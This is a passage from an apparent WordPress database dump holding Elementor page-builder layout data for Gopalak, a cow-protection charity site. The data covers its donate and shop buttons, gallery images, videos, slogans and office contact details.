cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11434,1901,'_elementor_page_assets','a:0:{}'),(11436,1902,'_elementor_edit_mode','builder'),(11437,1902,'_elementor_template_type','wp-page'),(11438,1902,'_elementor_version','3.7.8'),(11439,1902,'_wp_page_template','elementor_canvas'),(11440,1902,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 